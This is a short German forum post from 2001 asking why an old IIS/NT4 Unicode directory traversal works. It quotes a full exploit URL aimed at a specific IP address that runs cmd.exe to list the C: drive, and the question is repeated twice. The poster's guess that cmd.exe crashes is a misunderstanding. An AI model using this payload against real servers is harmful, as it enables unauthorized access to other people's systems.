sneac
25.04.01, 19:51
Mit diesem string "141.31.158.206/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\" kann man die Festplatte von 141.31.158.206 per Browswer auslesen. Der Bug ist schon älter und funktioniert nur bei NT4 mit älteren SP's.
Kann mir jemand erklären was da genau passiert? Ich weiss nur das die cmd.exe abstürzt und den dir-Befehl am Ende des Strings ausführt. Aber warum??
Kann mir jemand erklären was da genau passiert? Ich weiss nur das die cmd.exe abstürzt und den dir-Befehl am Ende des Strings ausführt. Aber warum??